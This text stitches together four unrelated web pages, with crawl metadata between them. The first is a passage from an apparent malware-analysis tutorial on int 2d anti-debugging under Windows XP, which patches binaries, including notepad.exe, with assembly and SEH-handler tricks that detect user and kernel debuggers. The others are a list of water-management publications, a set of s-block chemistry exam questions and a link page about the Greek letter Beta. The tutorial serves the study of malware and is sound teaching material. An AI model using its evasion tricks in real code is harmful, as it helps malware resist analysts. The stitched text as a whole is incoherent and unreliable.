multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="DEBUGGED VERSION" /noexecute=optin /fastdetect /debug /debugport=com1 /baudrate=115200
(2) Manual configuration of COM ports.
In some versions of XP, COM ports have to be manually configured. You can follow jorgensen's tutorial on "How to Add a Serial Port in Windows XP and 7 Guest
" (follow the XP part). It consists of two steps: (1) manually add a COM port in Control Panel and (2) manually configure COM1 as the port number.
(3) Test run of WinDbg.
Start your XP guest
in the debug mode
Now in the host machine
, launch the "Windows SDK 7.1" command window coming with WinDbg. Change directory to "c:\Program Files\Debugging Tools for Windows(x86)" and type the following. You should be able to get a window as shown in Figure 1.
windbg -b -k com:pipe,port=\\.\pipe\com_11
You might notice that currently you are not able to access your XP Guest. This is because WinDbg stops its running, Simply type "g
" (standing for "go") in the WinDbg window, and let the XP Guest continue.
3. Experiment 1: Int 2d on Cygwin
|Figure 1: Screenshot of WinDbg|
In the following, we demonstrate some of the interesting behaviors of Int 2d using a simple program Int2dPrint.exe. The C++ source of the program is shown in the following. The output of the program should be "AAAABBBB". We added a fflush(stdout) to enforce the output in an eager mode and before each printf() statement, there are five integer operations to allow us insert additional machine code later
int a = 0;
int b = 0;
int c = 0;
int d = 0;
int e = 0;
a = 0; b = 0; c = 0; d = 0; e = 0;
Source code of Int2dPrint.exe
Figure 2 shows the assembly of the compiled code.Clearly,the 'MOV [EBP-xx], 0' instructions between 0x4010BA and 0x4010D6 correspond to the integer assignments "int a=0" etc. in the source program. The "MOV [ESP], 0X402020" at 0x4010DD is to push the parameter (the starting address of constant string "AAAA") into the stack, for the printf() call. Also note that before the fflush call at 0x4010F4, the program calls cygwin.__getreent. It is to get the thread specific re-entrant structure so that the stdout (file descriptor of the standard output) can be retrieved. In fact, you can infer that the stdout is located at offset 0x8 of the reentrant structure.
3.1 Patching Binary Code
|Figure 2. Compiled Binary of Int2dPrint.cc|
Now let us roll our sleeves and prepare the patch the Int2dPrint.exe. The binary program is compiled using g++ under Cygwin. To run it, you need the cygwin1.dll in Cygwin's bin folder. You can choose to compile it by yourself, or use the one provided in the zipped project folder.
Make sure that your XP guest is running in NON-DEBUG mode!
We now add the following assembly code at location 0x4010F9 of Int2dPrint.exe (the first "int a=0" before the printf("BBBB")). Intuitively, the code tests the value of EAX after the int 2d call. If EAX is 0 (here "JZ" means Jump if Zero), the program will jump to 0x401138, which skips the printf("BBBB"). Notice that this occurs only when the instruction "inc EAX" is skipped.
xor EAX, EAX # set EAX=0;
int 2d # invoke the exception handler
inc EAX # if executed, will set EAX=1
cmp EAX, 0
JZ 0x401138 # if EAX=0, will skip printf("BBBB");
The assemble Code to Insert
The following shows you how to patch the code using IMM:
(1) Right click at 0x4010F9 in the CPU pane, and choose "Assemble
". (Or simple press Spacebar at the location). Enter the code as above.
(2) Right click in the CPU pane, choose "Copy to Executable
" --> "All Modified
", then click "Copy All
". A window of modified instructions will show up. Close that window and click "Yes" to save. Save the file as Int2dPrint_EAX_0_JZ0.exe
. The name suggests that the EAX input parameter to the int 2d service is 0, and we expect it to skip the printf("BBBB") if EAX=0, i.e., the output of the program should be "AAAA". (this, of course, depends on whether the "inc EAX" instruction is executed or not).
In Figure 3, you can find the disassembly of Int2dPrint_EAX_0_JZ0.exe
. Setting a breakpoint at 0x004010BA, you can execute the program step by step in IMM. You might find that the output is "AAAA" (i.e., "BBBB" is skipped). It seems to confirm the conclusion of byte scission of int 2d.You can also run the program in a command window, the output is the same.
|Figure 3. Disassembly of Int2dPrint_EAX_0_JZ0.exe|
But wait, how about another experiment. Let's modify the instruction at 0x401101 and make it "JNZ 0x401138
" (name it as Int2dPrint_EAX_0_JNZ0.exe
). What is the expected output? "AAAABBBB"? You might find that in IMM, the program outputs "AAAABBBB"; but if run in command window, it generates "AAAA" only!!!
(Notice that we have ruled out the possibility that the I/O output was lost in buffer - because we call the fflush(stdout) to enforce all outout immediately). What does this mean? There could be two possibilities:
(1). Somehow, the instruction "INC EAX" is mysteriously executed (in the regular execution of Int2dPrint_EAX_0_JNZ0.exe). This makes no sense, because prior to 0x401101, the program is exactly the same as Int2dPrint_EAX_0_JZ0.exe.
(2). There is something tricky in the exception handler code (it could be the SEH of the program itself, or the KiDispatch in the kernel).
We will later come back to this strange behavior, and provide an explanation.
3.2 Experiments with Kernel-Debugging Mode
Now let's reboot the guest OS into the DEBUG mode
(but without launching WinDbg
in the host machine). Let's re-run the two programs, you might have some interesting finding. Both programs hang the guest OS
Now let's reboot the guest OS again into the DEBUG mode and launch WinDbg in the host machine (press "g" twice to let it continue). Now start the Int2dPrint_EAX_0_JNZ0.exe in command window. What is your observation? Figure 4 displays the result: the debugger stops at 0x4010fd (the "inc EAX" instruction) on exception 80000003 (the exception code "BREAKPOINT" in windows)! If you type "g", the program will proceed and produce "AAAA"!
(while in the non-debugged windows mode and command window, it's producing "AAAABBBB"!
|Figure 4: Running Result of Int2dPrint_EAX_0_JNZ0.exe|
Now let us summarize our observations so far in Table 1 (I did not discuss some of the experiments here but you can repeat them using the files provided).
|Table 1: Summary of Experiment 1|
To simply put: int 2dh is a much more powerful technique to examine the existence of debuggers than people previously thought
(see the reference list of tutorial 3
). It can be used to detect the existence of both ring 3 (user level) and ring 0 (kernel level) debuggers. For example, using Table 1, we can easily tell if Windows is running in DEBUG mode (i.e., kernel debugger enabled) or not, and if a kernel debugger like WinDbg is hooked to the debug COM port or not. We can also tell the existence of a user level debugger such as IMM, whether windows is running in non-debug or debug mode. The delicacy is that the final output of the int 2dh instruction is affected by many factors, and experiment 1 only covers a subset of them. The following is a re-cap of some of the important facts:
- EAX, ECX, EDX are the parameters to the int 2d service. EAX (1,2,3,4) represent the printing, interactive prompt, load image, unload image. See Almeida's tutorial for more details.Notice that we are supplying an EAX value 0, which is not expected by the service! (normal values should be from 1 to 4).
- Once the int 2d instruction is executed, CPU locates the interrupt vector and jumps to the handler routine, which is the part of OS.
- OS wraps the details of hardware exception, and generates kernel data structures such as Exception_Record, which contains Exception Code: 80000003 (represents a breakpoint exception).
- Then control is forwarded to kernel call KiDispatchException, which depending on if Windows is running in kernel mode, exhibits very sophisticated behavior. See details in G. Nebbett, "Windows NT/2000 Native API Reference" (pp 441 gives pseudo code of KiDispatchException). For example, in windows debug mode, this generally involves forwarding the exception to debugger first (calling DbgkForwardException), and then the invocation of user program installed SEH handlers, and then forward the exception to debugger a second time.
We now proceed to briefly explain all the behaviors that we have observed.
Case 1. Non-Debug Mode and Command Window (column 2 in Table 1):
this is the only case that Int2dPrint_EAX_0_JZ0.exe and Int2dPrint_EAX_0_JNZ0.exe behave the same way
. There is only one explanation: the inc EAX is not executed - not because the exception handling behaves differently in a debugged environment, but because the entire process is terminated
. To illustrate the point, observe the two screenshots in Figure 5, which are generated by the IMM debugger via (View->SEH Chain
). Diagram (a) shows the SEH chain when the program is just started, you can see that the default handler kernel32.7C839AC0 (means the entry address of the handler is 7c839ac0 and it is located in kernel32). If you set a breakpoint right before the printf(), you might notice that the SEH chain now includes another handler from cygwin (in Fig 5(b))! It's the cygwin handler which directly terminates the process (without throwing any error messages); if it is the kernel32 handler, it would pop a standard windows error dialog.
Case 2. Non-Debug Mode and IMM Debugger
|Figure 5: SEH Chain of Int2dPrint_EAX_0_JZ0.exe before and after reaching the main()|
(column 3 in Table 1): Based on the logic of the two programs, you can soon reach the conclusion that the byte instruction right after int 2dh is skipped! There are two observations here: (1) the Cygwin handler is NEVER
executed! This is because the Immunity Debugger takes the control first (Recall the logic of KiDispatchException and the KiForwardException to debugger port). (2) Immunity Debugger modifies the value of EIP register, because the exception is a breakpoint. See discussion in Ferrie's article about IMM's behavior [1
]. The result of shifting one byte, however, is also affected by the kernel behavior (look at the EIP-- operation in KiDispatchException (see pp. 439 of Nebbett's book ). The combined effect is to shift one byte. Note that if replacing IMM with another user level debugger such as IDA, you might have a different result.
Case 3. Debug Mode without WinDbg Attached and CMD shell
(column 4 in Table 1): windows freeze! The reason is clear: no debuggers are listening to the debug port and the breakpoint exception is not handled (no one advances the EIP register).
Case 4. Debug Mode without WinDbg Attached and Run in IMM
(column 5 in Table 1): This is similar to case 2. If you F9 (and run the program) in IMM, you might notice that IMM stops at the SECOND instruction
right after int 2dh (i.e, "CMP EAX,0
") first (because it's a breakpoint exception, but the kernel debugging service is actually not triggered). If you F9 (continue) the program, it continues and exhibits the same behavior as Case 2. Again, the byte scission is the combined result of IMM and the kernel behavior (on int exceptions).
Case 5. Debug Mode with WinDbg Attached and Run in CMD shell
(column 6 in Table 1):In this case, WinDbg stops at the instruction right after int 2dh
(i.e., "inc EAX
") and if continues, executes the "inc EAX" instruction.
Case 6. Debug Mode with WinDbg Attached and Run in IMM
(column 7 in Table 1):In this case, WinDbg never gets the breakpoint exception, it's the user level debugger IMM gets the breakpoint exception first and like case 4, IMM readjusts the EIP register so that it stops at the SECOND INSTRUCTION
after int 2d. It is interesting to note that, even when WinDbg is initiated, if you start a user debugger, it gets/overrides the WinDbg on the processing of breakpoints. This is of course understandable -- think about using Visual Studio in the debugged mode for debugging a program, it is natural to pass the breakpoint event to Visual Studio first. Once the user level debugger declares that the exception has been handled, there is no need to to pass to the kernel debugger for handling.
Clearly, IMM debugger has a "defect" in its implementation.
First, it blindly processes a breakpoint exception even if this is not a registered exception in its breakpoint list. Second, the kernel service handles the readjustment of EIP differently for int 3 and int 2d (even though both of them are wrapped as the 80000003 exception in windows). When IMM does not differentiate the cases, the combined effect is that the readjustment of EIP is "over-cooked" and we see the byte scission.
3.3 Challenges of the Day
All of the above discussion are based on the assumption that EAX is 0 when calling the int 2d service. Notice that this is a value unexpected by the windows kernel -- the legal values are 1, 2, 3, and 4 (debug print, interactive, load image, unload image). Your challenges today is to find out the cases when EAX is set to 1, 2, 3, 4, and other unexpected values and assess the system behavior. You will have interesting discoveries.
4. Experiment 2: notepad
There is another interesting area we have not explored: the user installed SEH. The Int2d programs are good examples. The preamble code before the main function installs an SEH handler offered by Cygwin. It immediately leads to the termination of the process. It is interesting to observe the behavior of the default kernel32 handler. The following experiment sheds some light.
4.1 Experiment Design
When we use File->Open menu of notepad, we will always see a dialog popped up. Our plan is to insert the code in Section 3.1 before the call for popping dialog, and observe if there is any byte scission.
The first question is how to locate the code in notepad.exe that launches a file open dialog. We will again use some immunity debugger tricks. It is widely known that user32.dll provides important system functions that are related to graphical user interface. We could examine the visible functions by user32.dll using the following approach.
- Open notepad.exe (in c:\windows) using the Immunity Debugger
- View -> Executable Modules
- Right click on "user32.dll" and select "View->Names". This exposes the entry address of all externally visible functions of the dll. Browse the list of functions, we may find a collections of functions such as CreateDialogIndirectParamA and CreateDialogIndirectParamW. Press "F2" to set a software breakpoint on each of them.
- Now F9 to run the notepad program. Click File->Open and the IMM stops at 7E4EF01F. Go back to the View->Names window, you will find that it is the entry address of CreateDialogIndirectParamW.
- Now remove all other breakpoints (except CreateDialogIndirectParam), so that we are not distracted by others. You can do this in View->Breakpoints window to remove the ones you don't want.
- Restart the program (make sure that your BP is set), click file->open, now you are stopping at CreateDialogIndirectParamW. We will now take advantage of once nice feature in IMM. Click Debug-> Execute Till User Code (to allow us get to the notepad.exe code directly!). Note that since the dialog is a modal dialog (which sticks there until you respond), you have to go back to the running notepad and cancel the dialog. Then the IMM stops at instruction 0x01002D89 of notepad.exe! This is right after the call of GetOpenFileNameW, which we just returns from.
|Figure 6. Disassembly of notepad.exe|
The disassembly of notepad.exe is quite straightforward. At 0x01002D27, it sets up the dialog file filter "*.txt", and then at 0x01002D3D, it calls the GetOpenFileW function. The return value is stored in EAX. At 0x01002D89, it tests the value of EAX. If it is 0 (meaning the file dialog is canceled), the program control jumps to 0x01002DE0 (which directly exists the File->open processing).
We now can insert our instructions (most from Section 3.1) at 0x01002D27 (the side-effect is that the dialog file filter is broken - but this is ok). The code is shown below (we call it notepad_EAX_0_JZ0.exe
. Similarly, we can generate notepad_EAX_0_JNZ0.exe
xor EAX, EAX # set EAX=0;
int 2d # invoke the exception handler
inc EAX # if executed, will set EAX=1
cmp EAX, 0
JZ 0x01002D89 # if EAX=0, will skip printf("BBBB");
Run notepad_EAX_0_JZ0.exe in a command window (undebugged window), you will get the standard exception window thrown by windows. If you click the "details" link of the error dialog, you will be able to see the detailed information: note the error code 0x80000003 and the address of the exception (0x01002D2B!). I believe now you can easily draw the conclusion about the exception handler of kernel32.dll.
4.2 Challenge of the Day
|Figure 7: Error Report|
Our question is: are you sure that the error dialog is thrown by the handler of kernel32.7C839AC0?
Prove your argument.
5. Experiment 3: SEH Handler Technique
Recall that the SEH handler installed by the user program itself can also affect the running behavior of int 2d. For example, Int2dPrint_EAX_0_JZ0.exe installed a handler in Cygwin1.dll, it leads to the termination of the process immediately; while the default kernel32.dll handler throws out an exception dialog that displays debugging information. In this experiment, we repeat Ferrie's example in [3
] and explore further potential possibilities of anti-debugging.
Figures 8 and 9 present our slightly adapted version of Ferrie's example in [3
] . The program is modified from the Int2dPrint.exe. The first part of the code is displayed in Figure 8, starting from 0x004010F9 and ending at 0x0040110E. We now briefly explain the logic.
Basically, the code is to install a new exception handler registration record (recall that SEH is a linked list and each registration record has two elements: prev pointer and the entry address of handler). So instruction at 0x004010FB is to set up the handler address attribute to 0x004016E8
(we'll explain later), and at 0x00401100 it is to set the prev pointer attribute. Then the instruction at 0x00401103 resets FS:, which always points to the first element in the SEH chain. The rest of the code does the old trick: it puts an "INC EAX" instruction right after the int 2d instruction and depending on whether the instruction is skipped, it is able to tell the existence of debugger.
|Figure 8. Part I of Ferrie's Code|
We now examine the exception handler code at 0x004016E8
. It is shown in Figure 9, starting at 0x004016E8 and ending at 0x004016F4. It has three instructions. At 0x004016E8, it puts a word 0x43434343 into address 0x00402025. If you study the instruction at 0x0040111c (in Figure 8), you might notice that at 0x00402025, it stores the string "BBBB". So this instruction is essentially to store "CCCC" into the RAM. If the SEH handler is executed and if the second printf() statement is executed, you should see "AAAACCCC" in output, instead of "AAAABBBB"
. You might wonder, why not just change the value of a register (e.g., EBX) in the handler to indicate that the SEH is executed? Recall that interrupt handler of OS will recover the value of registers from kernel stack - no matter what value you set on a register (except for EAX), it will be wiped out by OS after return.
The last two instructions of the SEH handler simply returns 0. Notice that, as shown by Pietrek in [1
], "0" means ExceptionContinueExecution
, i.e., the exception has been handled and the interrupted process should resume. There are other values that you can play with, e.g., "1" means ExceptionContinueSearch, i.e., this handler could not solve the problem and the search has to be continued on the SEH chain to find the next handler. Note that these values are defined in the EXCEPT.h.
|Figure 9. Part II of Ferrie's Code|
There could be another factor that affects your experimental results. The immunity debugger can be configured on whether or not to pass the exception to a user program. Click the "Debugger Options" menu in IMM, and then the "Exceptions" tab (shown in Figure 10). You can specify to pass all exceptions to user programs (by clicking the "add range" button and select all exceptions). After the configuration is done, running the program using "Shift + F9
" will pass the exceptions to user installed SEH (compared with F9).
|Figure 10. Configuration of Exception Handling of IMM|
Similar to Section 4, we can run our program (Int2dprint_EAX0_RET0_JZ0.exe, meaning setting EAX to 0 when calling int 2d, and returning 0 in the SEH handler), under different environments, with debugging mode turned on or not. The results are displayed in Figure 11.
: when running in command window, the output is "AAAACCCC". Clearly, the user installed SEH is executed and the byte scission did not occur (i.e., the "inc EAX" instruction is indeed executed). Compare it with the similar running environment in Table 1, you can immediately understand the effect of returning 0 in SEH: it tells the OS: "everything is fine. Don't kill the process!".
If you run the program in IMM, using F9 (without passing exceptions to user program), the result is "AAAA", where the "inc EAX" is skipped by IMM (similar to Table 1) and the user installed SEH is never executed; however, if you choose shift+F9 to pass exceptions to user program, the SEH is executed and the "inc EAX" is executed! It seems that in the "shift+F9" mode, IMM's does not re-adjust the EIP (as stated in Ferrie's article).
Debug-Mode with WinDbg Attached
: Now when WinDbg is attached, the command line running of the program yields "AAAABBBB". This means that "inc EAX" is executed but the SEH is not executed! I believe, similarly, you can explain the IMM running result.
Now, the conclusion is: the use of user installed SEH enables more possibilities to detect the existence of debuggers and how they are configured!
5.1 Challenges of the Day
|Figure 11. Experimental Results of Ferrie's Example|
Play with the return values of your SEH handler, set it to 1, 2, and other values such as negative integers. What is your observation?
The int 2d anti-debugging technique is essentially an application of OS finger printing, i.e., from the behaviors of a system to tell its version and configuration. From the point of view of a program analysis researcher, it could be a very exciting problem to automatically generate such anti-debugging techniques, given the source/binary code of an operating system.
M. Pietrek, "A Crash Course on the Depth of Win32Tm Structured Exception Handling," Microsoft System Journal, 1997/01. Available at http://www.microsoft.com/msj/0197/exception/exception.aspxhttp://www.microsoft.com/msj/0197/exception/exception.aspx
G. Nebbett, "Windows NT/2000 Native API Reference", pp. 439-441, ISBN: 1578701996.
P. Ferrie, "Anti-Unpacker Tricks - Part Three", Virus Bulletin Feb 2009. Available at http://pferrie.tripod.com/papers/unpackers23.pdf
, Retrieved 09/07/2011. | <urn:uuid:090a59b8-fdba-4b3f-8905-41a66a7c8c11> | CC-MAIN-2023-14 | https://fumalwareanalysis.blogspot.com/2011/10/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950422.77/warc/CC-MAIN-20230402074255-20230402104255-00603.warc.gz | en | 0.854909 | 6,532 | 2.921875 | 3 |
UN-Water Analytical Brief – Unconventional Water Resources
Around 60% of the global population lives in areas of water stress where available supplies cannot sustainably meet demand for at least part of the year. As water scarcity is expected to continue and intensify in dry and overpopulated areas, the world at large is in danger of leaving the water scarcity challenge to future generations who will be confronted with the consequences of today’s practices.
With women better results in water management
This publication by Women for Partnership and GIZ is based on a study that consists of desk research and a presentation and analysis of thirteen case studies covering private water operators, governmental water agencies, community groups, national and international NGOs, and research institutes in several parts of the globe, including India, Tanzania, Great Britain, Bolivia, Bulgaria, Armenia, India, the Nile Basin, Malawi, Jordan, Madagascar, and Africa. The practices described in the case studies vary from access to water, sanitation, and hygiene, to water awareness, water quality, the fight against pollution, irrigation, research in the field of climate and water, to transboundary water management and the complete water sector within a country,
In many countries, women are responsible for water and have therefore gained significant knowledge in the field of water management. This knowledge is insufficiently utilised in the professional water sector. It is as such, a hidden source of ‘capacity’, a source of knowledge often not available in other sectors.
Unconventional water sources
Unconventional water resources are essential in building a water future in dry areas where water is recognized as a precious resource and a cornerstone of the circular economy.
Read more on Unconventional water sources:
Climate Change and Community Resilience Insights from South Asia
Editors: A. K. Enamul Haque · Pranab Mukhopadhyay · Mani Nepal · Md Rumi Shammin
A timely publication that highlights local initiatives on climate change adaptation and resilience building in South Asia, which is one of the most vulnerable regions of the world to climate change impacts. Using a narrative style, this book draws on stories and examples from seven South Asian countries—Bangladesh, Bhutan, India, Maldives, Nepal, Pakistan, and Sri Lanka—to highlight how communities in South Asia are building resilience to climate change. A total of 58 authors have contributed to this volume.
The role of sound groundwater resources management and governance to achieve water security
The true value of groundwater is hidden beneath the ground. Often, the general public and policy- makers are not fully aware of the importance of this precious resource, even though groundwater provides nearly 50% of all drinking water. While the pressure on groundwater has been steadily increasing, this invisible resource continues to receive less attention than it deserves. This Global Water Security Issues (GWSI) Series 3, The role of sound groundwater resources management and governance to achieve water security explores various case studies of tools and analyses of management, groundwater quality issues, transboundary aquifer management, and stakeholder engagement. TheGWSI shines a spotlight on groundwater resources to highlight the importance of integrated water resource management and strengthened capacity for robust management decisions.
Read more: https://unesdoc.unesco.org/ark:/48223/pf0000379093.locale=en
Urban water security: A comparative assessment and policy analysis of five cities in diverse developing countries of Asia
Cities are rapidly expanding and invariably moving toward densification. Global challenges such as climate change, land-use change, environmental degradation, and expanding economy in urban areas increase water-related problems. This study addresses the difficulty of operationalizing the concept of urban water security by applying an integrative indicator-based urban water security assessment framework, formed by integrating two well-established frameworks, to evaluate the water security state in five different cities in Asia: Bangkok, Jaipur, Hanoi, Islamabad, and Madaba.
Read more: https://www.sciencedirect.com/science/article/abs/pii/S221146452200015X?via%3Dihub
Basin connected cities, connecting urban stakeholders with their watersheds
Around 55% of the world’s population live in urban areas or cities, and this is expected to rise to 68% by 20501. As cities grow there is increasing pressure on natural resources within and beyond their hydrological basins. While water nnects across sectors, places and people, as well as geographic and temporal scales, hydrological and administrative boundaries do not always coincide.Building a “City-
Basin Dialogue” can be a mechanism to move towards sustainable water management. Different stakeholders from catchment to consumer can be engaged in identifying and implementing appropriate and sustainable solutions for effective city-basin multi-level governance.
Read more : https://iwa-network.org/wp-content/uploads/2022/03/Brochure_Handbook_Basin_Connected_Cities_final.pdf
UN World Water Development Report
The United Nations World Water Development Report (WWDR) is UN-Water’s flagship report on water and sanitation issues, focusing on a different theme each year. The report is published by UNESCO, on behalf of UN-Water and its production is coordinated by the UNESCO World Water Assessment Programme. The report gives insight on main trends concerning the state, use and management of freshwater and sanitation, based on work done by the Members and Partners of UN-Water
Read more: https://www.unwater.org/publication_categories/world-water-development-report/#:~:text=The%20United%20Nations%20World%20Water,UNESCO%20World%20Water%20Assessment%20Programme
Green Roads for Water: Guidelines for Road Infrastructure in Support of Water Management and Climate Resilience
This book provides strategies to use roads for beneficial water management tailored to diverse landscapes and climates, including watershed areas, semiarid climates, coastal lowlands, mountainous areas, and floodplains. The underlying premise of Green Roads is therefore quite simple: designing roads to fit their natural and anthropomorphic contexts; minimize externalities; and balance preservation of the road, water resources, landscape, and soil resources will usually cost less than traditional protective resilience approaches and will produce more sustainable overall outcomes.
Women Water Champions: A compendium of 41 women stewards from the grassroots
A report published in June 2021 by UNDP India. UNDP-SIWI Water Governance Facility (WGF)’s under the Goal Waters Programme, with support from Sweden, provided funding and technical expertise to UNDP India in this WWC initiative.
This compendium is only a first step in documenting and recognising women’s participation in the water sector, among many others who are breaking gender barriers in water management.
These women are from different regions, from the remotest of villages and tribal belts in the country, from different socio-economic and educational backgrounds. It covers nearly 14 states in India: Andhra Pradesh, Assam, Bihar, Haryana, Gujarat, Jharkhand, Maharashtra, Madhya Pradesh, Odisha, Rajasthan, Tamil Nadu, Uttarakhand, Uttar Pradesh, West Bengal.
The works range from mobilizing communities on water conservations, flood management, promoting and practicing water use efficiency, creating rainwater harvesting infrastructure, irrigation water management and improving agricultural productivity, restoration of groundwater, awareness building in clean drinking water, leading water user groups, and working towards sustainable development. These pathbreaking works highlight that these women have not only secured their livelihoods and protected their communities through environmentally sound and sustainable practices, they have often also helped to further empower other women, upscale the activities and bolster economic opportunities for many.
Water, Flood Management and Water Security Under a Changing Climate: Proceedings from the 7th International Conference on Water and Flood Management
This book presents selected papers from the 7th International Conference on Water and Flood Management, with a special focus on Water Security under Climate Change, held in Dhaka, Bangladesh in March 2019. The biennial conference is organized by Institute of Water and Flood Management of Bangladesh University of Engineering and Technology.
The recent decades have experienced more frequent natural calamities and it is believed that climate change is an important driving factor for such hazards. Each part of the hydrological cycle is affected by global climate change. Moreover, increasing population and economic activities are posing a bigger threat to water sources. To ensure sustainable livelihoods, safeguard ecosystem services, and enhance socio-economic development, water security needs to be investigated widely in a global and regional context.
Read more https://link.springer.com/book/10.1007/978-3-030-47786-8#editorsandaffiliations
Community Participation in Decision-Making Evidence from an experiment in providing safe drinking water in Bangladesh
Delegating decision-making authorities to communities in projects to provide safe drinking water has the potential to improve projects in terms of outcomes and reported impact. In villages where projects were implemented under a participatory decision making structure (the NGO Facilitated Community Participation model), a slightly larger number of safe drinking water sources were installed(0.2 more sources) but obtained an 8% higher increase in access to safe drinking water, than under a non-participatory decision-making structure (the TopDown model). These results are broadly consistent with evidence accumulated in the past through practitioner’s experience and cross-sectional analysis, but this is the first time that experimental evidence has been available to test the hypothesis that participation in decision-making has a positive impact on the result of social programs.
Read more: \Bangladesh\info
Rainwater Harvesting System: Using water for the Future
Findings from quasi-experimental study: WASH in Schools – MHM and Learning Impact
The impact evaluation data shows that the chances of managing menstrual hygiene properly are 1.3-fold higher among schoolgirls that received inclusive WASH intervention than schoolgirls who did not.
Read more https://www.wateraid.org/bd/sites/g/files/jkxoof236/files/2020-07/WASH%20in%20School-MHM%20and%20Learning%20Impact%20-WAB.pdf
Prospects, practices and principles of urban rainwater harvesting in Bangladesh: A Guidebook for Professionals, Practitioners and Students
In the context or urban environment adopting rainwater harvesting technology can reduce the pressure on municipal water supply.
Read more https://www.wateraid.org/bd/sites/g/files/jkxoof236/files/2020-06/3P%20of%20URWH%20in%20Bangladesh.pdf
Research study on Nutrition Security and Equity in its Access in Watershed Development Programmes
The priority for the implementation of any watershed Programme is to improve the drinking water status, improving the land productivity and livelihoods of its stakeholders.
International Rainwater Catchment Systems Experiences: Towards Water Security
Due to population growth, pollution, and climate change, water scarcity will be one of the most critical problems all around the world in the next 15 years. Today, around 10% of the world’s population lacks a proper water supply service. Harvesting rainwater and using it for drinking, domestic, industrial, and agricultural uses will help to supply quality water to urban and rural populations. This book has sections on rainwater harvesting in Bangladesh and Sri Lanka, and from all around the world.
Climate Change: Science and Politics – A CSE India publication
“We need more reality checks in the climate change narrative. The impacts are certain, but as yet, action is pusillanimous. We deserve better. In these COVID-19 times, we have seen disorder and disruption at a scale that we never imagined. So, now we need the same scale to fix what is broken in our relationship with nature. The future, like never before, is in our hands. Nature has spoken. Now we should speak gently back to her. Tread lightly on the Earth”.
This publication uses latest statistics, scientific information and data from sources across the world to cover every key aspect of climate change:
– Net Zero
– Carbon Budgets etc. | <urn:uuid:613a4d34-c97d-4fb3-8c39-0502cc91b2b8> | CC-MAIN-2023-14 | https://sarainwater.org/publications/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945287.43/warc/CC-MAIN-20230324144746-20230324174746-00404.warc.gz | en | 0.910863 | 2,587 | 2.75 | 3 |
Some s Block Elements
Previous Years Questions
MCQ (Single Correct Answer)
A sample of MgCO3 is dissolved in dil. HCl and the solution is neutralized with ammonia and buffered with NH4Cl / NH4OH. Disodium hydrogen phosphate r...
To a solution of colourless sodium salt, a solution of lead nitrate was added to have a white precipitate which dissolves in warm water and reprecipit...
Indicate the products (X) and (Y) in the following reactionsNa2S + nS(n = 1 $$-$$ 8) $$\to$$ (X)Na2SO3 + S $$\to$$ (Y)...
The white precipitate (Y), obtained on passing colorless and odourless gas (X) through an ammoniacal solution of NaCl, losses about 37% of its weight ...
In the extraction of Ca by electro reduction of molten CaCl2 some CaF2 is added to the electrolyte for the following reason :
The compound, which evolves carbon dioxide on treatment with aqueous solution of sodium bicarbonate at 25$$^\circ$$C, is
The reactive species in chlorine bleach is
Which of the following is least thermally stable?
Which of the following solutions will turn violet when a drop of lime juice is added to it?
MCQ (More than One Correct Answer)
The correct statement(s) about B2H6 is /are :
During electrolysis of molten NaCl, some water was added. What will happen? | <urn:uuid:3833114e-8228-47b0-adb8-ff244f5a9a53> | CC-MAIN-2023-14 | https://questions.examside.com/past-years/jee/wb-jee/chemistry/some-s-block-elements | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943555.25/warc/CC-MAIN-20230320175948-20230320205948-00604.warc.gz | en | 0.923215 | 333 | 3.109375 | 3 |
45 relations: Acrophony, Ancient Greek, Argos, ß, B, Be (Cyrillic), Bet (letter), Beta, Beta (climbing), Beta (finance), Beta angle, Beta particle, Betacam, Betamax, Byzantium, Corinth, Cursive, Cyclades, Descender, Gortyn, Greek alphabet, Greek numerals, High-definition video, Hurricane Beta, International Phonetic Alphabet, JVC, Megara, Milos, Modern Greek, NTSC, Ordinal number, Phoenician alphabet, Regression analysis, Romanization of Greek, Santorini, Semitic languages, Sony, Standardized coefficient, Type I and type II errors, Ve (Cyrillic), VHS, Voiced bilabial fricative, Voiced bilabial stop, Voiced labiodental fricative, 2005 Atlantic hurricane season.
Acrophony (Greek: ἄκρος akros uppermost + φωνή phone sound) is the naming of letters of an alphabetic writing system so that a letter's name begins with the letter itself.
New!!: Beta and Acrophony · See more »
The Ancient Greek language includes the forms of Greek used in ancient Greece and the ancient world from around the 9th century BC to the 6th century AD.
New!!: Beta and Ancient Greek · See more »
Argos (Modern Greek: Άργος; Ancient Greek: Ἄργος) is a city in Argolis, the Peloponnese, Greece and is one of the oldest continuously inhabited cities in the world.
New!!: Beta and Argos · See more »
In German orthography, the grapheme ß, called Eszett or scharfes S, in English "sharp S", represents the phoneme in Standard German, specifically when following long vowels and diphthongs, while ss is used after short vowels.
New!!: Beta and ß · See more »
B or b (pronounced) is the second letter of the ISO basic Latin alphabet.
New!!: Beta and B · See more »
Be (Б б italics: Б б б) is a letter of the Cyrillic script.
New!!: Beta and Be (Cyrillic) · See more »
Bet, Beth, Beh, or Vet is the second letter of the Semitic abjads, including Phoenician Bēt, Hebrew Bēt, Aramaic Bēth, Syriac Bēṯ ܒ, and Arabic ب Its sound value is a voiced bilabial stop ⟨b⟩ or a voiced labiodental fricative ⟨v.
New!!: Beta and Bet (letter) · See more »
Beta (uppercase, lowercase, or cursive; bē̂ta or βήτα) is the second letter of the Greek alphabet.
New!!: Beta and Beta · See more »
Beta is climbing jargon that designates information about a climb.
New!!: Beta and Beta (climbing) · See more »
In finance, the beta (β or beta coefficient) of an investment indicates whether the investment is more or less volatile than the market as a whole.
New!!: Beta and Beta (finance) · See more »
The beta angle (\boldsymbol) is a measurement that is used most notably in spaceflight.
New!!: Beta and Beta angle · See more »
A beta particle, also called beta ray or beta radiation, (symbol β) is a high-energy, high-speed electron or positron emitted by the radioactive decay of an atomic nucleus during the process of beta decay.
New!!: Beta and Beta particle · See more »
Betacam is a family of half-inch professional videocassette products developed by Sony in 1982.
New!!: Beta and Betacam · See more »
Betamax (also called Beta, as in its logo) is a consumer-level analog-recording and cassette format of magnetic tape for video.
New!!: Beta and Betamax · See more »
Byzantium or Byzantion (Ancient Greek: Βυζάντιον, Byzántion) was an ancient Greek colony in early antiquity that later became Constantinople, and later Istanbul.
New!!: Beta and Byzantium · See more »
